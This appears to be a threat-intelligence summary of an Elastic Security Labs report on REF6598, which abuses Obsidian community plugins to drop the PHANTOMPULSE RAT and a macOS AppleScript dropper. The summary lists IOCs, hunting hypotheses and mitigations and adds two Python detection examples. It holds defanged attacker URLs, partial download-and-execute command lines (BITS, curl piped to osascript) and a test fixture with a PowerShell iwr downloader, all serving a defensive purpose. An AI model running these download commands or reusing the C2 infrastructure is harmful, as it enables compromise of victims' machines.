
Phantom in the vault: Obsidian abused to deliver PhantomPulse RAT

Threat actor REF6598 is targeting the financial and cryptocurrency sectors using social engineering to trick victims into opening a malicious Obsidian vault. The attack leverages Obsidian's community plugins to execute cross-platform attack chains, culminating in the deployment of the PHANTOMPULSE RAT on Windows and an AppleScript dropper on macOS.

Sens: 24h | Conf: high | Analyzed: 2026-04-13

Authors: Elastic Security Labs

Actors: REF6598, PHANTOMPULSE, PHANTOMPULL

Source:Elastic Security Labs

IOCs · 4

Key Takeaways

  • Obsidian note-taking app abused as an initial access vector via trojanized community plugins.
  • Cross-platform attack chain targeting Windows and macOS users in the financial and cryptocurrency sectors.
  • Deploys PHANTOMPULSE, a novel AI-assisted Windows RAT with blockchain-based C2 resolution.
  • macOS payload utilizes a multi-stage AppleScript dropper with a Telegram dead-drop fallback for C2.
  • A weakness in the blockchain C2 mechanism allows responders to potentially hijack the C2 resolution.

Affected Systems

  • Windows
  • macOS
  • Obsidian

Attack Chain

The attack begins with social engineering, tricking victims into opening a malicious Obsidian vault and enabling community plugins. The 'Shell Commands' plugin executes a PowerShell script on Windows or an AppleScript on macOS. On Windows, this downloads the PHANTOMPULL loader, which reflectively loads the PHANTOMPULSE RAT into memory. PHANTOMPULSE establishes C2 via blockchain transaction data and performs various backdoor functions. On macOS, a LaunchAgent is created for persistence, and an obfuscated AppleScript dropper retrieves the next stage from a C2 domain or a fallback Telegram channel.

Detection Availability

  • YARA Rules: Yes
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: Yes
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No
  • Platforms: Elastic Security

Elastic provides KQL queries to detect anomalous child processes spawned by Obsidian and YARA rules to identify the PHANTOMPULL loader and PHANTOMPULSE RAT.

Detection Engineering Assessment

  • EDR Visibility: High. EDR can easily detect anomalous child processes (PowerShell, bash, osascript) spawning from the Obsidian application, as well as reflective loading and module stomping behaviors.
  • Network Visibility: Medium. C2 traffic uses standard HTTPS and WinHTTP, blending in with normal traffic. Blockchain API queries (Blockscout) and Telegram API calls may be visible but are often legitimate.
  • Detection Difficulty: Moderate. While the initial execution from Obsidian is highly anomalous and easy to spot, the subsequent in-memory reflective loading and blockchain-based C2 resolution make tracking the payload and infrastructure more difficult.

Required Log Sources

  • Process Creation (Event ID 4688 / Sysmon Event ID 1)
  • File Creation (Sysmon Event ID 11)
  • Network Connections (Sysmon Event ID 3)

Hunting Hypotheses

  • Hypothesis: Look for shell interpreters (powershell.exe, cmd.exe, bash, sh, zsh) spawned as child processes of Obsidian.exe or Obsidian. | Telemetry: Process Creation | ATT&CK Stage: Execution | FP Risk: Low
  • Hypothesis: Identify network connections to Blockscout API endpoints (eth.blockscout.com, base.blockscout.com, optimism.blockscout.com) originating from unbacked memory regions or suspicious processes. | Telemetry: Network Connections, Process Memory | ATT&CK Stage: Command and Control | FP Risk: Medium
  • Hypothesis: Detect the creation of LaunchAgent plist files containing randomized names in the ~/Library/LaunchAgents/ directory on macOS. | Telemetry: File Creation | ATT&CK Stage: Persistence | FP Risk: Low
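The three hypotheses above as runnable detection logic over constructed Sysmon-style events (an added example, not from the Elastic report); the event field names, the browser allow-list and the randomized-label regex are assumptions of this example.

```python
import re

OBSIDIAN = {"obsidian.exe", "obsidian"}
SHELLS = {"powershell.exe", "cmd.exe", "bash", "sh", "zsh", "osascript"}
BLOCKSCOUT = {"eth.blockscout.com", "base.blockscout.com", "optimism.blockscout.com"}
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "safari", "google chrome"}
# Heuristic (assumption): a com.<12+ lowercase letters>.plist label with no further
# dotted components looks machine-generated, like com.vfrfeufhtjpwgray.plist above.
RANDOM_PLIST = re.compile(r"^com\.[a-z]{12,}\.plist$")

def _basename(path):
    """Last path component, lower-cased, for both Windows and POSIX separators."""
    return re.split(r"[\\/]", path)[-1].lower()

def hunt_obsidian_child(ev):
    """Hypothesis 1: shell interpreter whose parent is Obsidian (4688 / Sysmon 1)."""
    return _basename(ev.get("parent_image", "")) in OBSIDIAN and _basename(ev.get("image", "")) in SHELLS

def hunt_blockscout_c2(ev):
    """Hypothesis 2: Blockscout API contacted from unbacked memory or a non-browser (Sysmon 3)."""
    if ev.get("dest_hostname", "").lower() not in BLOCKSCOUT:
        return False
    return bool(ev.get("unbacked_memory")) or _basename(ev.get("image", "")) not in BROWSERS

def hunt_launchagent(ev):
    """Hypothesis 3: randomized-name plist written under ~/Library/LaunchAgents (Sysmon 11)."""
    path = ev.get("target_filename", "")
    return "/Library/LaunchAgents/" in path and RANDOM_PLIST.match(path.rsplit("/", 1)[-1]) is not None

HUNTS = (("obsidian_child", hunt_obsidian_child), ("blockscout_c2", hunt_blockscout_c2), ("launchagent", hunt_launchagent))

def run_hunts(events):
    """Return (hunt name, event id) for every event that satisfies a hypothesis."""
    return [(name, ev["id"]) for ev in events for name, fn in HUNTS if fn(ev)]

# Constructed sample telemetry (not from the report); ids 1, 3, 5 and 6 should fire.
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Users\user\AppData\Local\Obsidian\Obsidian.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"id": 2, "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe"},
    {"id": 3, "parent_image": "/Applications/Obsidian.app/Contents/MacOS/Obsidian", "image": "/usr/bin/osascript"},
    {"id": 4, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "dest_hostname": "eth.blockscout.com"},
    {"id": 5, "image": r"C:\Windows\System32\svchost.exe", "dest_hostname": "base.blockscout.com", "unbacked_memory": True},
    {"id": 6, "target_filename": "/Users/user/Library/LaunchAgents/com.vfrfeufhtjpwgray.plist"},
    {"id": 7, "target_filename": "/Users/user/Library/LaunchAgents/com.apple.sync.plist"},
]

if __name__ == "__main__":
    for hit in run_hunts(SAMPLE_EVENTS):
        print(hit)
```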

Control Gaps

  • Application-level plugin policies for Obsidian are often non-existent or unenforced.
  • Traditional AV may miss the malicious JSON configuration files used for initial execution.

Key Behavioral Indicators

  • Obsidian spawning powershell.exe or osascript
  • Use of BitsTransfer to download executables to the TEMP directory
  • Timer queue callbacks used for execution delays (50ms)

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Block the identified C2 IPs and domains.
  • Search endpoints for the presence of the malicious Obsidian plugins (Shell Commands, Hider) and associated data.json configurations.
  • Isolate any hosts exhibiting anomalous child processes spawned by Obsidian.
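One way to carry out the second item, sweeping a directory tree for vaults that carry the Shell Commands plugin and flagging download or interpreter strings in its data.json, as an added example that is not Elastic's tooling. It does not assume the plugin's real configuration schema (every string value in the file is inspected), and the fixture vaults it builds are constructed data.

```python
import json
import os
import re
import tempfile

# Path of the Shell Commands plugin config relative to a vault root (from the report's file paths).
PLUGIN_DATA = os.path.join(".obsidian", "plugins", "obsidian-shellcommands", "data.json")
# Strings worth a human look; tuned to the chain described above (iwr, BITS, osascript, curl).
SUSPECT = re.compile(r"powershell|\biwr\b|invoke-webrequest|start-bitstransfer|osascript|\bcurl\b|/bin/bash|-enc\b|frombase64string", re.I)

def _strings(node):
    """Yield every string value in a JSON document, whatever its shape."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, (dict, list)):
        for v in (node.values() if isinstance(node, dict) else node):
            yield from _strings(v)

def scan_vault(vault_dir):
    """Suspicious command strings from this vault's Shell Commands data.json, [] if the plugin is absent."""
    path = os.path.join(vault_dir, PLUGIN_DATA)
    if not os.path.isfile(path):
        return []
    with open(path, encoding="utf-8") as f:
        return [s for s in _strings(json.load(f)) if SUSPECT.search(s)]

def scan_tree(root):
    """Map each vault (a directory holding .obsidian) under root to its scan_vault hits."""
    results = {}
    for dirpath, dirnames, _ in os.walk(root):
        if ".obsidian" in dirnames:
            results[os.path.basename(dirpath)] = scan_vault(dirpath)
    return results

def build_sample_root():
    """Constructed fixture: a clean vault plus one shipping a downloader in the plugin config (not the real schema)."""
    root = tempfile.mkdtemp()
    cmds = {"notes": "git pull",
            "shared-vault": "powershell -w hidden -c \"iwr hxxp://placeholder.invalid/script1.ps1 -OutFile $env:TEMP\\tt.ps1\""}
    for vault, cmd in cmds.items():
        os.makedirs(os.path.join(root, vault, os.path.dirname(PLUGIN_DATA)))
        with open(os.path.join(root, vault, PLUGIN_DATA), "w", encoding="utf-8") as f:
            json.dump({"shell_commands": {"a1b2": {"command": cmd, "events": ["vault-open"]}}}, f)
    return root

if __name__ == "__main__":
    for vault, hits in scan_tree(build_sample_root()).items():
        print(vault, "->", hits or "clean")
```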

Infrastructure Hardening

  • Implement application control to restrict the execution of unauthorized scripts or binaries from user directories.
  • Enforce network segmentation to limit lateral movement if a host is compromised.

User Protection

  • Deploy EDR solutions configured to monitor for suspicious child process creation from productivity applications.
  • Implement policies to restrict or monitor the installation of community plugins in applications like Obsidian.

Security Awareness

  • Educate users in the financial and cryptocurrency sectors about social engineering tactics on LinkedIn and Telegram.
  • Train users to be cautious when opening shared cloud vaults or enabling third-party plugins in productivity tools.

MITRE ATT&CK Mapping

  • T1566.003 - Phishing: Spearphishing via Service
  • T1204.002 - User Execution: Malicious File
  • T1059.001 - Command and Scripting Interpreter: PowerShell
  • T1059.002 - Command and Scripting Interpreter: AppleScript
  • T1140 - Deobfuscate/Decode Files or Information
  • T1620 - Reflective Code Loading
  • T1497.003 - Virtualization/Sandbox Evasion: Time Based Evasion
  • T1055 - Process Injection
  • T1053.005 - Scheduled Task/Job: Scheduled Task
  • T1547.011 - Boot or Logon Autostart Execution: Plist Modification
  • T1056.001 - Input Capture: Keylogging
  • T1113 - Screen Capture
  • T1082 - System Information Discovery
  • T1548.002 - Abuse Elevation Control Mechanism: Bypass UAC

Additional IOCs

  • IPs:
    • 104[.]21[.]79[.]142 - Cloudflare IP for PhantomPulse C2 panel
    • 172[.]67[.]146[.]15 - Cloudflare IP for PhantomPulse C2 panel
    • 188[.]114[.]97[.]1 - Historical IP for PhantomPulse C2 panel
    • 188[.]114[.]96[.]1 - Historical IP for PhantomPulse C2 panel
  • Domains:
    • thoroughly-publisher-troy-clara[.]trycloudflare[.]com - Prior PhantomPulse C2 (Cloudflare Tunnel)
    • eth[.]blockscout[.]com - Ethereum L1 Blockscout API used for C2 resolution
    • base[.]blockscout[.]com - Base L2 Blockscout API used for C2 resolution
    • optimism[.]blockscout[.]com - Optimism L2 Blockscout API used for C2 resolution
  • URLs:
    • hxxp://195[.]3[.]222[.]251/script1[.]ps1 - URL for Stage 2 PowerShell script
    • hxxp://195[.]3[.]222[.]251/syncobs[.]exe?q=%23OBSIDIAN - URL for PHANTOMPULL loader download
    • hxxp://195[.]3[.]222[.]251/stuk-phase - C2 endpoint for loader status reporting
    • t[.]me/ax03bot - macOS dropper Telegram fallback C2
  • File Paths:
    • C:\Users\user\Documents\<redacted_vault_name>\.obsidian\plugins\obsidian-shellcommands\data.json - Malicious Obsidian Shell Commands configuration file
    • $env:TEMP\tt.ps1 - Temporary path for downloaded PowerShell script
    • $env:TEMP\syncobs.exe - Temporary path for PHANTOMPULL loader
    • ~/Library/LaunchAgents/com.vfrfeufhtjpwgray.plist - macOS LaunchAgent persistence file
  • Command Lines:
    • Purpose: Download and execute second-stage PowerShell script | Tools: powershell.exe, iwr | Stage: Execution
    • Purpose: Download next-stage binary using BITS | Tools: Start-BitsTransfer | Stage: Payload Delivery | Start-BitsTransfer -Source ... -Destination "$env:TEMP\syncobs.exe"
    • Purpose: Execute macOS payload via osascript | Tools: osascript, bash | Stage: Execution | /bin/bash -c ... | osascript
    • Purpose: Download macOS second-stage payload | Tools: curl, osascript | Stage: Payload Delivery | curl -s --connect-timeout 5 ... -X POST <C2_URL> ... | osascript
  • Other:
    • hVNBUORXNiFLhYYh - Mutex created by PHANTOMPULL loader
    • 0x38796B8479fDAE0A72e5E7e326c87a637D0Cbc0E - Funding wallet for C2 resolution wallet